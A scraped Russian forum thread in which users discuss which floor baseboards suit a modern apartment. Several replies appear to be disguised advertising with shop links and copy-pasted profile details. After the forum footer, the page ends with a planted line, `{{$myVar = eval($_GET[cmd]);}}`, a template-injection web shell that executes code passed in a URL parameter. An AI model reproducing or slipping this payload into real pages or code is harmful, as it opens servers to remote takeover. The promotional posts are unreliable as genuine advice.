+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Плинтуса


  1. #1
    Мимо проходил Добродел is on a distinguished road Аватар для Добродел
    Регистрация
    30.06.2020
    Откуда
    Мой адрес не дом и не улица
    Машина
    Лучшее
    Сообщений
    15

    Плинтуса

    Заканчиваю ремонт в своей квартире в Москве. Нужно купить и установить плинтуса и можно будет заняться закупкой мебели в квартиру. До сих пор не мог выбрать нормальный плинтус, поэтому и ничего не купил. Что скажете, такие напольные деревянные плинтуса будут гармонично смотреться в современном интерьере https://kd.market/stroitelstvo-i-rem...lnye-plintusy/ ?

  2. #2
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    Деревянные плинтуса вне времени. Они будут отлично смотреться в любом интерьере. Думаю, вам стоит изначально просмотреть в сети фото интерьеров с данными плинтусами. Тогда поймете как они выглядят в реальности.

  3. #3
    Мимо проходил ЖоржЗибров is on a distinguished road Аватар для ЖоржЗибров
    Регистрация
    24.08.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    40
    А мне пластиковые плинтуса нравятся. Деревянные, как-то, вообще не очень. Я бы пластиковые себе купил на вашем месте. У нас дома именно они везде уложены.

  4. #4
    Мимо проходил ГумбинМакс is on a distinguished road Аватар для ГумбинМакс
    Регистрация
    19.02.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    42
    У нас плинтуса из ольхи. Очень хорошо смотрятся. Мы их специально ничем не вскрывали чтобы была видна естественная структура и слышен запах дерева.

  5. #5
    GTI-Racing Teni is on a distinguished road Аватар для Teni
    Регистрация
    05.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    570
    Здравствуйте, посоветуйте, где купить декоративный плинтус?

  6. #6
    GTI-Racing bergamo is on a distinguished road Аватар для bergamo
    Регистрация
    05.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    685
    Привет, мне хотелось сделать в античном стиле гостиную свою. Решила воспользоваться порталом https://www.mr-plintus.ru/ ,вариант просто отличный. Мне нравится такой портал.

  7. #7
    Мимо проходил Valeria192 is on a distinguished road Аватар для Valeria192
    Регистрация
    24.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    31
    Плинтусы имеют важную практическую миссию, поскольку они служат для защиты напольного и настенного покрытия от возможных загрязнений и повреждений, а также для оптической модификации пространства. В современных дизайнах на смену традиционному деревянному все чаще приходит плинтус из алюминия. Его используют на стыке полов и стен, чтобы скрыть щель, защитить этот участок от минимальных повреждений, придать обстановке поистине презентабельный вид. Именно такие плинтусы можно купить в интернет-магазине https://alucreator.com.ua/.

    В первую очередь, эти изделия отличаются выносливостью и стойкостью к разным механическим воздействиям. Товар не теряет пригожий вид под влиянием влаги, моющих и дезинфицирующих средств, перепадов температур. Алюминий легок и пластичен, из него можно создавать изделия разных форм и размеров.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}